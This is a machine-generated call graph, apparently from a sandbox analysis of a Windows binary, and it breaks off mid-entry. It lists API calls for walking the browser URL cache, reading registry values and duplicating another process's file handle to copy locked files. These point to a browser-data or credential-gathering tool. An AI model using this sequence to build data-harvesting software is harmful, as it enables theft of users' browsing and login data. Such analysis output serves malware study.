40077 409a45 GetTempPathW 39283->40077 40076 40a6e6 WideCharToMultiByte 39284->40076 39289 409d1f 6 API calls 39285->39289 39287 40b827 CopyFileW 39287->39284 39289->39291 39290 40b866 39292 444432 121 API calls 39290->39292 40043 40bb98 39291->40043 39293 40b879 39292->39293 39294 40bad5 39293->39294 39295 40b273 27 API calls 39293->39295 39296 40baeb 39294->39296 39297 40bade DeleteFileW 39294->39297 39298 40b89a 39295->39298 39299 40b04b ??3@YAXPAX 39296->39299 39297->39296 39300 438552 134 API calls 39298->39300 39301 40baf3 39299->39301 39302 40b8a4 39300->39302 39301->38779 39303 40bacd 39302->39303 39305 4251c4 137 API calls 39302->39305 39304 443d90 111 API calls 39303->39304 39304->39294 39328 40b8b8 39305->39328 39306 40bac6 40089 424f26 123 API calls 39306->40089 39307 40b8bd memset 40080 425413 17 API calls 39307->40080 39310 425413 17 API calls 39310->39328 39313 40a71b MultiByteToWideChar 39313->39328 39314 40a734 MultiByteToWideChar 39314->39328 39317 40b9b5 memcmp 39317->39328 39318 4099c6 2 API calls 39318->39328 39319 404423 37 API calls 39319->39328 39322 40bb3e memset memcpy 40090 40a734 MultiByteToWideChar 39322->40090 39323 4251c4 137 API calls 39323->39328 39325 40bb88 LocalFree 39325->39328 39328->39306 39328->39307 39328->39310 39328->39313 39328->39314 39328->39317 39328->39318 39328->39319 39328->39322 39328->39323 39329 40ba5f memcmp 39328->39329 40081 4253ef 16 API calls 39328->40081 40082 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39328->40082 40083 4253af 17 API calls 39328->40083 40084 4253cf 17 API calls 39328->40084 40085 447280 memset 39328->40085 40086 447960 memset memcpy memcpy memcpy 39328->40086 40087 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39328->40087 40088 447920 memcpy memcpy memcpy 39328->40088 39329->39328 39330->38854 39332 40aed1 39331->39332 39333 40aec7 FindClose 39331->39333 39332->38789 39333->39332 39335 4099d7 39334->39335 39336 4099da memcpy 39334->39336 39335->39336 39336->38837 39338 40b2cc 27 API calls 39337->39338 39339 44543f 39338->39339 39340 409d1f 6 API calls 39339->39340 39341 44544f 39340->39341 40182 409b98 GetFileAttributesW 39341->40182 39343 445476 39346 40b2cc 27 API calls 39343->39346 39344 44545e 39344->39343 39345 40b6ef 252 API calls 39344->39345 39345->39343 39347 445482 39346->39347 39348 409d1f 6 API calls 39347->39348 39349 445492 39348->39349 40183 409b98 GetFileAttributesW 39349->40183 39351 4454a1 39352 4454b9 39351->39352 39353 40b6ef 252 API calls 39351->39353 39352->38863 39353->39352 39354->38862 39355->38886 39356->38892 39357->38927 39358->38908 39359->38952 39360->38952 39361->38938 39362->38968 39363->38970 39364->38972 39366 414c2e 16 API calls 39365->39366 39367 40c2ae 39366->39367 39437 40c1d3 39367->39437 39372 40c3be 39389 40a8ab 39372->39389 39373 40afcf 2 API calls 39374 40c2fd FindFirstUrlCacheEntryW 39373->39374 39375 40c3b6 39374->39375 39376 40c31e wcschr 39374->39376 39377 40b04b ??3@YAXPAX 39375->39377 39378 40c331 39376->39378 39379 40c35e FindNextUrlCacheEntryW 39376->39379 39377->39372 39380 40a8ab 9 API calls 39378->39380 39379->39376 39381 40c373 GetLastError 39379->39381 39384 40c33e wcschr 39380->39384 39382 40c3ad FindCloseUrlCache 39381->39382 39383 40c37e 39381->39383 39382->39375 39385 40afcf 2 API calls 39383->39385 39384->39379 39386 40c34f 39384->39386 39387 40c391 FindNextUrlCacheEntryW 39385->39387 39388 40a8ab 9 API calls 39386->39388 39387->39376 39387->39382 39388->39379 39553 40a97a 39389->39553 39392 40a8cc 39392->38979 39393 40a8d0 7 API calls 39393->39392 39558 40b1ab free free 39394->39558 39396 40c3dd 39397 40b2cc 27 API calls 39396->39397 39398 40c3e7 39397->39398 39559 414592 RegOpenKeyExW 39398->39559 39400 40c3f4 39401 40c50e 39400->39401 39402 40c3ff 39400->39402 39416 405337 39401->39416 39403 40a9ce 4 API calls 39402->39403 39404 40c418 memset 39403->39404 39560 40aa1d 39404->39560 39407 40c471 39409 40c47a _wcsupr 39407->39409 39408 40c505 RegCloseKey 39408->39401 39410 40a8d0 7 API calls 39409->39410 39411 40c498 39410->39411 39412 40a8d0 7 API calls 39411->39412 39413 40c4ac memset 39412->39413 39414 40aa1d 39413->39414 39415 40c4e4 RegEnumValueW 39414->39415 39415->39408 39415->39409 39562 405220 39416->39562 39420 4099c6 2 API calls 39419->39420 39421 40a714 _wcslwr 39420->39421 39422 40c634 39421->39422 39619 405361 39422->39619 39425 40c65c wcslen 39622 4053b6 39 API calls 39425->39622 39426 40c71d wcslen 39426->38993 39428 40c677 39429 40c713 39428->39429 39623 40538b 39 API calls 39428->39623 39625 4053df 39 API calls 39429->39625 39432 40c6a5 39432->39429 39433 40c6a9 memset 39432->39433 39434 40c6d3 39433->39434 39436->38986 39438 40ae18 9 API calls 39437->39438 39444 40c210 39438->39444 39439 40ae51 9 API calls 39439->39444 39440 40c264 39441 40aebe FindClose 39440->39441 39443 40c26f 39441->39443 39442 40add4 2 API calls 39442->39444 39449 40e5ed memset memset 39443->39449 39444->39439 39444->39440 39444->39442 39445 40c231 _wcsicmp 39444->39445 39446 40c1d3 35 API calls 39444->39446 39445->39444 39447 40c248 39445->39447 39446->39444 39462 40c084 22 API calls 39447->39462 39450 414c2e 16 API calls 39449->39450 39451 40e63f 39450->39451 39452 409d1f 6 API calls 39451->39452 39453 40e658 39452->39453 39463 409b98 GetFileAttributesW 39453->39463 39455 40e667 39456 40e680 39455->39456 39457 409d1f 6 API calls 39455->39457 39464 409b98 GetFileAttributesW 39456->39464 39457->39456 39459 40e68f 39461 40c2d8 39459->39461 39465 40e4b2 39459->39465 39461->39372 39461->39373 39462->39444 39463->39455 39464->39459 39486 40e01e 39465->39486 39467 40e593 39468 40e5b0 39467->39468 39469 40e59c DeleteFileW 39467->39469 39471 40b04b ??3@YAXPAX 39468->39471 39469->39468 39470 40e521 39470->39467 39509 40e175 39470->39509 39472 40e5bb 39471->39472 39474 40e5c4 CloseHandle 39472->39474 39475 40e5cc 39472->39475 39474->39475 39477 40b633 free 39475->39477 39476 40e573 39479 40e584 39476->39479 39480 40e57c CloseHandle 39476->39480 39478 40e5db 39477->39478 39482 40b633 free 39478->39482 39552 40b1ab free free 39479->39552 39480->39479 39481 40e540 39481->39476 39529 40e2ab 39481->39529 39484 40e5e3 39482->39484 39484->39461 39487 406214 22 API calls 39486->39487 39488 40e03c 39487->39488 39489 40e16b 39488->39489 39490 40dd85 74 API calls 39488->39490 39489->39470 39491 40e06b 39490->39491 39491->39489 39492 40afcf ??2@YAPAXI ??3@YAXPAX 39491->39492 39493 40e08d OpenProcess 39492->39493 39494 40e0a4 GetCurrentProcess DuplicateHandle 39493->39494 39498 40e152 39493->39498 39495 40e0d0 GetFileSize 39494->39495 39496 40e14a CloseHandle 39494->39496 39499 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39495->39499 39496->39498 39497 40e160 39501 40b04b ??3@YAXPAX 39497->39501 39498->39497 39500 406214 22 API calls 39498->39500 39502 40e0ea 39499->39502 39500->39497 39501->39489 39503 4096dc CreateFileW 39502->39503 39504 40e0f1 CreateFileMappingW 39503->39504 39505 40e140 CloseHandle CloseHandle 39504->39505 39506 40e10b MapViewOfFile 39504->39506 39505->39496 39507 40e13b CloseHandle 39506->39507 39508 40e11f WriteFile UnmapViewOfFile 39506->39508 39507->39505 39508->39507 39510 40e18c 39509->39510 39511 406b90 11 API calls 39510->39511 39512 40e19f 39511->39512 39513 40e1a7 memset 39512->39513 39514 40e299 39512->39514 39519 40e1e8 39513->39519 39515 4069a3 ??3@YAXPAX free 39514->39515 39516 40e2a4 39515->39516 39516->39481 39517 406e8f 13 API calls 39517->39519 39518 406b53 SetFilePointerEx ReadFile 39518->39519 39519->39517 39519->39518 39520 40e283 39519->39520 39521 40dd50 _wcsicmp 39519->39521 39525 40742e 8 API calls 39519->39525 39526 40aae3 wcslen wcslen _memicmp 39519->39526 39527 40e244 _snwprintf 39519->39527 39522 40e291 39520->39522 39523 40e288 free 39520->39523 39521->39519 39524 40aa04 free 39522->39524 39523->39522 39524->39514 39525->39519 39526->39519 39528 40a8d0 7 API calls 39527->39528 39528->39519 39530 40e2c2 39529->39530 39531 406b90 11 API calls 39530->39531 39551 40e2d3 39531->39551 39532 40e4a0 39533 4069a3 ??3@YAXPAX free 39532->39533 39535 40e4ab 39533->39535 39534 406e8f 13 API calls 39534->39551 39535->39481 39536 406b53 SetFilePointerEx ReadFile 39536->39551 39537 40e489 39538 40aa04 free 39537->39538 39539 40e491 39538->39539 39539->39532 39540 40e497 free 39539->39540 39540->39532 39541 40dd50 _wcsicmp 39541->39551 39542 40dd50 _wcsicmp 39543 40e376 memset 39542->39543 39544 40aa29 6 API calls 39543->39544 39544->39551 39545 40742e 8 API calls 39545->39551 39546 40e3e0 memcpy 39546->39551 39547 40e3b3 wcschr 39547->39551 39548 40e3fb memcpy 39548->39551 39549 40e416 memcpy 39549->39551 39550 40e431 memcpy 39550->39551 39551->39532 39551->39534 39551->39536 39551->39537 39551->39541 39551->39542 39551->39545 39551->39546 39551->39547 39551->39548 39551->39549 39551->39550 39552->39467 39555 40a980 39553->39555 39554 40a8bb 39554->39392 39554->39393 39555->39554 39556 40a995 _wcsicmp 39555->39556 39557 40a99c wcscmp 39555->39557 39556->39555 39557->39555 39558->39396 39559->39400 39561 40aa23 RegEnumValueW 39560->39561 39561->39407 39561->39408 39563 405335 39562->39563 39564 40522a 39562->39564 39563->38993 39565 40b2cc 27 API calls 39564->39565 39566 405234 39565->39566 39567 40a804 8 API calls 39566->39567 39568 40523a 39567->39568 39607 40b273 39568->39607 39570 405248 _mbscpy _mbscat GetProcAddress 39571 40b273 27 API calls 39570->39571 39572 405279 39571->39572 39610 405211 GetProcAddress 39572->39610 39574 405282 39575 40b273 27 API calls 39574->39575 39576 40528f 39575->39576 39608 40b58d 27 API calls 39607->39608 39609 40b18c 39608->39609 39609->39570 39610->39574 39620 405220 39 API calls 39619->39620 39621 405369 39620->39621 39621->39425 39621->39426 39622->39428 39623->39432 39625->39426 39627 40440c FreeLibrary 39626->39627 39628 40436d 39627->39628 39629 40a804 8 API calls 39628->39629 39630 404377 39629->39630 39631 404383 39630->39631 39632 404405 39630->39632 39633 40b273 27 API calls 39631->39633 39632->38998 39632->39000 39632->39001 39634 40438d GetProcAddress 39633->39634 39635 40b273 27 API calls 39634->39635 39636 4043a7 GetProcAddress 39635->39636 39637 40b273 27 API calls 39636->39637 39647 404413 FreeLibrary 39646->39647 39648 40441e 39646->39648 39647->39648 39648->39015 39649->39011 39651 40442e 39650->39651 39653 40447e 39650->39653 39653->39011 39664 4135f6 39663->39664 39665 4135eb FreeLibrary 39663->39665 39665->39664 39693 403a29 39692->39693 39707 403bed memset memset 39693->39707 39695 403ae7 39720 40b1ab free free 39695->39720 39696 403a3f memset 39701 403a2f 39696->39701 39698 403aef 39698->39055 39699 409d1f 6 API calls 39699->39701 39700 409b98 GetFileAttributesW 39700->39701 39701->39695 39701->39696 39701->39699 39701->39700 39702 40a8d0 7 API calls 39701->39702 39702->39701 39704 40a051 GetFileTime CloseHandle 39703->39704 39705 4039ca CompareFileTime 39703->39705 39704->39705 39705->39055 39706->39052 39708 414c2e 16 API calls 39707->39708 39709 403c38 39708->39709 39710 409719 2 API calls 39709->39710 39711 403c3f wcscat 39710->39711 39712 414c2e 16 API calls 39711->39712 39713 403c61 39712->39713 39714 409719 2 API calls 39713->39714 39715 403c68 wcscat 39714->39715 39721 403af5 39715->39721 39718 403af5 20 API calls 39719 403c95 39718->39719 39719->39701 39720->39698 39722 403b02 39721->39722 39723 40ae18 9 API calls 39722->39723 39725 403b37 39723->39725 39724 40ae51 9 API calls 39724->39725 39725->39724 39726 403bdb 39725->39726 39727 40add4 wcscmp wcscmp 39725->39727 39730 40ae18 9 API calls 39725->39730 39731 40aebe FindClose 39725->39731 39732 40a8d0 7 API calls 39725->39732 39728 40aebe FindClose 39726->39728 39727->39725 39729 403be6 39728->39729 39729->39718 39730->39725 39731->39725 39732->39725 39734 409d1f 6 API calls 39733->39734 39735 404190 39734->39735 39748 409b98 GetFileAttributesW 39735->39748 39737 40419c 39738 4041a7 6 API calls 39737->39738 39739 40435c 39737->39739 39741 40424f 39738->39741 39739->39080 39741->39739 39742 40425e memset 39741->39742 39744 409d1f 6 API calls 39741->39744 39745 40a8ab 9 API calls 39741->39745 39749 414842 39741->39749 39742->39741 39743 404296 wcscpy 39742->39743 39743->39741 39744->39741 39746 4042b6 memset memset _snwprintf wcscpy 39745->39746 39746->39741 39747->39078 39748->39737 39752 41443e 39749->39752 39751 414866 39751->39741 39753 41444b 39752->39753 39754 414451 39753->39754 39755 4144a3 GetPrivateProfileStringW 39753->39755 39756 414491 39754->39756 39757 414455 wcschr 39754->39757 39755->39751 39759 414495 WritePrivateProfileStringW 39756->39759 39757->39756 39758 414463 _snwprintf 39757->39758 39758->39759 39759->39751 39760->39084 39762 40b2cc 27 API calls 39761->39762 39763 409615 39762->39763 40026 413f4f 39999->40026 40002 413f37 K32GetModuleFileNameExW 40003 413f4a 40002->40003 40003->39146 40005 413969 wcscpy 40004->40005 40006 41396c wcschr 40004->40006 40009 413a3a 40005->40009 40006->40005 40008 41398e 40006->40008 40031 4097f7 wcslen wcslen _memicmp 40008->40031 40009->39146 40011 41399a 40012 4139a4 memset 40011->40012 40013 4139e6 40011->40013 40032 409dd5 GetWindowsDirectoryW wcscpy 40012->40032 40015 413a31 wcscpy 40013->40015 40016 4139ec memset 40013->40016 40015->40009 40033 409dd5 GetWindowsDirectoryW wcscpy 40016->40033 40017 4139c9 wcscpy wcscat 40017->40009 40019 413a11 memcpy wcscat 40019->40009 40021 413cb0 GetModuleHandleW 40020->40021 40022 413cda 40020->40022 40021->40022 40023 413cbf GetProcAddress 40021->40023 40024 413ce3 GetProcessTimes 40022->40024 40025 413cf6 40022->40025 40023->40022 40024->39149 40025->39149 40027 413f2f 40026->40027 40028 413f54 40026->40028 40027->40002 40027->40003 40029 40a804 8 API calls 40028->40029 40030 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40029->40030 40030->40027 40031->40011 40032->40017 40033->40019 40034->39169 40035->39192 40037 409cf9 GetVersionExW 40036->40037 40038 409d0a 40036->40038 40037->40038 40038->39199 40038->39201 40039->39205 40040->39208 40041->39210 40042->39276 40044 40bba5 40043->40044 40091 40cc26 40044->40091 40047 40bd4b 40112 40cc0c 40047->40112 40052 40b2cc 27 API calls 40053 40bbef 40052->40053 40119 40ccf0 _wcsicmp 40053->40119 40055 40bbf5 40055->40047 40120 40ccb4 6 API calls 40055->40120 40057 40bc26 40058 40cf04 17 API calls 40057->40058 40059 40bc2e 40058->40059 40060 40bd43 40059->40060 40061 40b2cc 27 API calls 40059->40061 40062 40cc0c 4 API calls 40060->40062 40063 40bc40 40061->40063 40062->40047 40121 40ccf0 _wcsicmp 40063->40121 40065 40bc46 40065->40060 40066 40bc61 memset memset WideCharToMultiByte 40065->40066 40122 40103c strlen 40066->40122 40068 40bcc0 40069 40b273 27 API calls 40068->40069 40070 40bcd0 memcmp 40069->40070 40070->40060 40071 40bce2 40070->40071 40072 404423 37 API calls 40071->40072 40073 40bd10 40072->40073 40073->40060 40074 40bd3a LocalFree 40073->40074 40075 40bd1f memcpy 40073->40075 40074->40060 40075->40074 40076->39290 40078 409a74 GetTempFileNameW 40077->40078 40079 409a66 GetWindowsDirectoryW 40077->40079 40078->39287 40079->40078 40080->39328 40081->39328 40082->39328 40083->39328 40084->39328 40085->39328 40086->39328 40087->39328 40088->39328 40089->39303 40090->39325 40123 4096c3 CreateFileW 40091->40123 40093 40cc34 40094 40cc3d GetFileSize 40093->40094 40095 40bbca 40093->40095 40096 40afcf 2 API calls 40094->40096 40095->40047 40103 40cf04 40095->40103 40097 40cc64 40096->40097 40124 40a2ef ReadFile 40097->40124 40099 40cc71 40125 40ab4a MultiByteToWideChar 40099->40125 40101 40cc95 CloseHandle 40102 40b04b ??3@YAXPAX 40101->40102 40102->40095 40104 40b633 free 40103->40104 40105 40cf14 40104->40105 40131 40b1ab free free 40105->40131 40107 40bbdd 40107->40047 40107->40052 40108 40cf1b 40108->40107 40110 40cfef 40108->40110 40132 40cd4b 40108->40132 40111 40cd4b 14 API calls 40110->40111 40111->40107 40113 40b633 free 40112->40113 40114 40cc15 40113->40114 40115 40aa04 free 40114->40115 40116 40cc1d 40115->40116 40181 40b1ab free free 40116->40181 40118 40b7d4 memset CreateFileW 40118->39282 40118->39283 40119->40055 40120->40057 40121->40065 40122->40068 40123->40093 40124->40099 40126 40ab6b 40125->40126 40130 40ab93 40125->40130 40127 40a9ce 4 API calls 40126->40127 40128 40ab74 40127->40128 40129 40ab7c MultiByteToWideChar 40128->40129 40129->40130 40130->40101 40131->40108 40133 40cd7b 40132->40133 40166 40aa29 40133->40166 40135 40cef5 40136 40aa04 free 40135->40136 40137 40cefd 40136->40137 40137->40108 40139 40aa29 6 API calls 40140 40ce1d 40139->40140 40141 40aa29 6 API calls 40140->40141 40142 40ce3e 40141->40142 40143 40ce6a 40142->40143 40174 40abb7 wcslen memmove 40142->40174 40144 40ce9f 40143->40144 40177 40abb7 wcslen memmove 40143->40177 40146 40a8d0 7 API calls 40144->40146 40149 40ceb5 40146->40149 40147 40ce56 40175 40aa71 wcslen 40147->40175 40156 40a8d0 7 API calls 40149->40156 40151 40ce8b 40178 40aa71 wcslen 40151->40178 40152 40ce5e 40176 40abb7 wcslen memmove 40152->40176 40154 40ce93 40179 40abb7 wcslen memmove 40154->40179 40158 40cecb 40156->40158 40180 40d00b malloc memcpy free free 40158->40180 40160 40cedd 40161 40aa04 free 40160->40161 40162 40cee5 40161->40162 40163 40aa04 free 40162->40163 40164 40ceed 40163->40164 40165 40aa04 free 40164->40165 40165->40135 40167 40aa33 40166->40167 40173 40aa63 40166->40173 40168 40aa44 40167->40168 40169 40aa38 wcslen 40167->40169 40170 40a9ce malloc memcpy free free 40168->40170 40169->40168 40171 40aa4d 40170->40171 40172 40aa51 memcpy 40171->40172 40171->40173 40172->40173 40173->40135 40173->40139 40174->40147 40175->40152 40176->40143 40177->40151 40178->40154 40179->40144 40180->40160 40181->40118 40182->39344 40183->39351 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40193 4148b6 FindResourceW 40194 4148f9 40193->40194 40195 4148cf SizeofResource 40193->40195 40195->40194 40196 4148e0 LoadResource 40195->40196 40196->40194 40197 4148ee LockResource 40196->40197 40197->40194 37712 415304 free 40198 441b3f 40208 43a9f6 40198->40208 40200 441b61 40381 4386af memset 40200->40381 40202 44189a 40203 442bd4 40202->40203 40204 4418e2 40202->40204 40205 4418ea 40203->40205 40383 441409 memset 40203->40383 40204->40205 40382 4414a9 12 API calls 40204->40382 40209 43aa20 40208->40209 40210 43aadf 40208->40210 40209->40210 40211 43aa34 memset 40209->40211 40210->40200 40212 43aa56 40211->40212 40213 43aa4d 40211->40213 40384 43a6e7 40212->40384 40392 42c02e memset 40213->40392 40218 43aad3 40394 4169a7 11 API calls 40218->40394 40219 43aaae 40219->40210 40219->40218 40234 43aae5 40219->40234 40220 43ac18 40223 43ac47 40220->40223 40396 42bbd5 memcpy memcpy memcpy memset memcpy 40220->40396 40224 43aca8 40223->40224 40397 438eed 16 API calls 40223->40397 40227 43acd5 40224->40227 40399 4233ae 11 API calls 40224->40399 40400 423426 11 API calls 40227->40400 40228 43ac87 40398 4233c5 16 API calls 40228->40398 40232 43ace1 40401 439811 163 API calls 40232->40401 40233 43a9f6 161 API calls 40233->40234 40234->40210 40234->40220 40234->40233 40395 439bbb 22 API calls 40234->40395 40236 43acfd 40241 43ad2c 40236->40241 40402 438eed 16 API calls 40236->40402 40238 43ad19 40403 4233c5 16 API calls 40238->40403 40239 43ad58 40404 44081d 163 API calls 40239->40404 40241->40239 40245 43add9 40241->40245 40244 43ae3a memset 40246 43ae73 40244->40246 40245->40245 40408 423426 11 API calls 40245->40408 40409 42e1c0 147 API calls 40246->40409 40247 43adab 40406 438c4e 163 API calls 40247->40406 40250 43ad6c 40250->40210 40250->40247 40405 42370b memset memcpy memset 40250->40405 40252 43adcc 40407 440f84 12 API calls 40252->40407 40253 43ae96 40410 42e1c0 147 API calls 40253->40410 40256 43aea8 40257 43aec1 40256->40257 40411 42e199 147 API calls 40256->40411 40258 43af00 40257->40258 40412 42e1c0 147 API calls 40257->40412 40258->40210 40262 43af1a 40258->40262 40263 43b3d9 40258->40263 40413 438eed 16 API calls 40262->40413 40268 43b3f6 40263->40268 40272 43b4c8 40263->40272 40265 43b60f 40265->40210 40472 4393a5 17 API calls 40265->40472 40267 43af2f 40414 4233c5 16 API calls 40267->40414 40454 432878 12 API calls 40268->40454 40270 43af51 40415 423426 11 API calls 40270->40415 40280 43b4f2 40272->40280 40460 42bbd5 memcpy memcpy memcpy memset memcpy 40272->40460 40274 43af7d 40416 423426 11 API calls 40274->40416 40278 43b529 40462 44081d 163 API calls 40278->40462 40279 43af94 40417 423330 11 API calls 40279->40417 40461 43a76c 21 API calls 40280->40461 40284 43afca 40418 423330 11 API calls 40284->40418 40285 43b47e 40288 43b497 40285->40288 40457 42374a memcpy memset memcpy memcpy memcpy 40285->40457 40286 43b544 40289 43b55c 40286->40289 40463 42c02e memset 40286->40463 40458 4233ae 11 API calls 40288->40458 40464 43a87a 163 API calls 40289->40464 40290 43afdb 40419 4233ae 11 API calls 40290->40419 40295 43b428 40306 43b462 40295->40306 40455 432b60 16 API calls 40295->40455 40297 43b56c 40300 43b58a 40297->40300 40465 423330 11 API calls 40297->40465 40298 43b4b1 40459 423399 11 API calls 40298->40459 40299 43afee 40420 44081d 163 API calls 40299->40420 40466 440f84 12 API calls 40300->40466 40302 43b4c1 40468 42db80 163 API calls 40302->40468 40456 423330 11 API calls 40306->40456 40308 43b592 40467 43a82f 16 API calls 40308->40467 40311 43b5b4 40469 438c4e 163 API calls 40311->40469 40313 43b5cf 40470 42c02e memset 40313->40470 40315 43b005 40315->40210 40319 43b01f 40315->40319 40421 42d836 163 API calls 40315->40421 40316 43b1ef 40431 4233c5 16 API calls 40316->40431 40319->40316 40429 423330 11 API calls 40319->40429 40430 42d71d 163 API calls 40319->40430 40320 43b212 40432 423330 11 API calls 40320->40432 40321 43b087 40422 4233ae 11 API calls 40321->40422 40322 43add4 40322->40265 40471 438f86 16 API calls 40322->40471 40326 43b22a 40433 42ccb5 11 API calls 40326->40433 40329 43b23f 40434 4233ae 11 API calls 40329->40434 40330 43b10f 40425 423330 11 API calls 40330->40425 40332 43b257 40435 4233ae 11 API calls 40332->40435 40336 43b129 40426 4233ae 11 API calls 40336->40426 40337 43b26e 40436 4233ae 11 API calls 40337->40436 40340 43b09a 40340->40330 40423 42cc15 19 API calls 40340->40423 40424 4233ae 11 API calls 40340->40424 40341 43b282 40437 43a87a 163 API calls 40341->40437 40343 43b13c 40427 440f84 12 API calls 40343->40427 40345 43b29d 40438 423330 11 API calls 40345->40438 40348 43b15f 40428 4233ae 11 API calls 40348->40428 40349 43b2af 40351 43b2b8 40349->40351 40352 43b2ce 40349->40352 40439 4233ae 11 API calls 40351->40439 40440 440f84 12 API calls 40352->40440 40355 43b2c9 40442 4233ae 11 API calls 40355->40442 40356 43b2da 40441 42370b memset memcpy memset 40356->40441 40359 43b2f9 40443 423330 11 API calls 40359->40443 40361 43b30b 40444 423330 11 API calls 40361->40444 40363 43b325 40445 423399 11 API calls 40363->40445 40365 43b332 40446 4233ae 11 API calls 40365->40446 40367 43b354 40447 423399 11 API calls 40367->40447 40369 43b364 40448 43a82f 16 API calls 40369->40448 40371 43b370 40449 42db80 163 API calls 40371->40449 40373 43b380 40450 438c4e 163 API calls 40373->40450 40375 43b39e 40451 423399 11 API calls 40375->40451 40377 43b3ae 40452 43a76c 21 API calls 40377->40452 40379 43b3c3 40453 423399 11 API calls 40379->40453 40381->40202 40382->40205 40383->40203 40385 43a6f5 40384->40385 40391 43a765 40384->40391 40385->40391 40473 42a115 40385->40473 40389 43a73d 40390 42a115 147 API calls 40389->40390 40389->40391 40390->40391 40391->40210 40393 4397fd memset 40391->40393 40392->40212 40393->40219 40394->40210 40395->40234 40396->40223 40397->40228 40398->40224 40399->40227 40400->40232 40401->40236 40402->40238 40403->40241 40404->40250 40405->40247 40406->40252 40407->40322 40408->40244 40409->40253 40410->40256 40411->40257 40412->40257 40413->40267 40414->40270 40415->40274 40416->40279 40417->40284 40418->40290 40419->40299 40420->40315 40421->40321 40422->40340 40423->40340 40424->40340 40425->40336 40426->40343 40427->40348 40428->40319 40429->40319 40430->40319 40431->40320 40432->40326 40433->40329 40434->40332 40435->40337 40436->40341 40437->40345 40438->40349 40439->40355 40440->40356 40441->40355 40442->40359 40443->40361 40444->40363 40445->40365 40446->40367 40447->40369 40448->40371 40449->40373 40450->40375 40451->40377 40452->40379 40453->40322 40454->40295 40455->40306 40456->40285 40457->40288 40458->40298 40459->40302 40460->40280 40461->40278 40462->40286 40463->40289 40464->40297 40465->40300 40466->40308 40467->40302 40468->40311 40469->40313 40470->40322 40471->40265 40472->40210 40474 42a175 40473->40474 40476 42a122 40473->40476 40474->40391 40479 42b13b 147 API calls 40474->40479 40476->40474 40477 42a115 147 API calls 40476->40477 40480 43a174 40476->40480 40504 42a0a8 147 API calls 40476->40504 40477->40476 40479->40389 40494 43a196 40480->40494 40495 43a19e 40480->40495 40481 43a306 40481->40494 40517 4388c4 14 API calls 40481->40517 40484 42a115 147 API calls 40484->40495 40485 415a91 memset 40485->40495 40486 43a642 40486->40494 40521 4169a7 11 API calls 40486->40521 40488 4165ff 11 API calls 40488->40495 40490 43a635 40520 42c02e memset 40490->40520 40494->40476 40495->40481 40495->40484 40495->40485 40495->40488 40495->40494 40505 42ff8c 40495->40505 40513 439504 13 API calls 40495->40513 40514 4312d0 147 API calls 40495->40514 40515 42be4c memcpy memcpy memcpy memset memcpy 40495->40515 40516 43a121 11 API calls 40495->40516 40497 4169a7 11 API calls 40498 43a325 40497->40498 40498->40486 40498->40490 40498->40494 40498->40497 40499 42b5b5 memset memcpy 40498->40499 40500 42bf4c 14 API calls 40498->40500 40503 4165ff 11 API calls 40498->40503 40518 42b63e 14 API calls 40498->40518 40519 42bfcf memcpy 40498->40519 40499->40498 40500->40498 40503->40498 40504->40476 40506 43817e 139 API calls 40505->40506 40507 42ff99 40506->40507 40508 42ffe3 40507->40508 40509 42ffd0 40507->40509 40512 42ff9d 40507->40512 40523 4169a7 11 API calls 40508->40523 40522 4169a7 11 API calls 40509->40522 40512->40495 40513->40495 40514->40495 40515->40495 40516->40495 40517->40498 40518->40498 40519->40498 40520->40486 40521->40494 40522->40512 40523->40512 40545 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37549 4260dd 37604 424251 120 API calls 37549->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37549 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37650 